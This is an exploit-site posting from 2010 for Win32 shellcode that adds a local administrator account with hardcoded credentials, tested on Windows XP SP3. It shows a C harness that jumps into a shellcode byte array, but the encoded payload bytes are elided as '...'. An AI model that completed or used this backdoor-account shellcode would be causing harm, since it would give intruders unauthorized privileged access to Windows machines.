[win32] - win32 generic - add new local administrator 326 bytes
Posted on 04 October 2010
=====================================================
win32 generic - add new local administrator 326 bytes
=====================================================

/*
Title: generic win32 - add new local administrator 326 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Dynamic opcode, encoded shellcode
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.100427-1636 and Build 2600.080413-2111
Greetz: offsec team, inj3ct0r team, hdm
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* 326-byte encoded shellcode */
char code[] = "...";

int main(int argc, char **argv)
{
    /* Cast the byte array to a function pointer and jump into it. */
    ((void (*)())code)();
    printf("New local admin Username: secuid0 Password: m0nk");
    return 0;
}

# Inj3ct0r.com [2010-10-04]